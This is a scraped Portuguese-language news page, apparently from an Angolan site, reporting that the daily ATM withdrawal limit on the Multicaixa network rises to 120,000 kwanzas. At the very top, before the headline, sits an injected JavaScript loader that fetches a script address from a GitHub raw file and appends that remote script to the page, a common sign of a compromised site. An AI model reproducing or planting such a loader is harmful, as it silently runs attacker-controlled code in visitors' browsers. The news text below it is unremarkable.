;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Economia sem macas: Limite de levantamento diário nos Caixas Automáticos passa para 120 mil kwanzas | RadioPlayDigital
Economia sem macas: Limite de levantamento diário nos Caixas Automáticos passa para 120 mil kwanzas

A partir desta quinta-feira, 26, o limite diário de levantamento de dinheiro nos Caixas Automáticos (CA), vulgo ATM, passa a ser de 120 mil kwanzas, anunciou, em comunicado de imprensa, a Empresa Interbancária de Serviços (EMIS).

A medida representa um acréscimo de 20 mil kwanzas ao limite antes estipulado, que era de 100 mil kwanzas, conforme ajustado pelo Instrutivo n.º 24/2021, de 7 de Dezembro.

No comunicado, a EMIS observa que os demais limites de levantamento na Rede Multicaixa vão permanecer inalterados. Deste modo, levantamento por operação continua a ter o limite de 60 mil kwanzas, os levantamentos diários cumulativos entre as operações feitas nos ATM e nos Terminais de Pagamento Automático (TPA) também continuam a ter o limite de 150 mil kwanzas.

A principal operadora do sistema de pagamentos angolano realça ainda que a Rede Multicaixa processa mais de 9,5 milhões de operações financeiras, contando com mais de 3 800 Caixas Automáticos, cerca de 190 mil TPA e mais de 1,5 milhão de utilizadores do Multicaixa Express.

Data de Emissão: 27-09-2024 às 07:10
Género(s): Comentário, Economia
 

Relacionados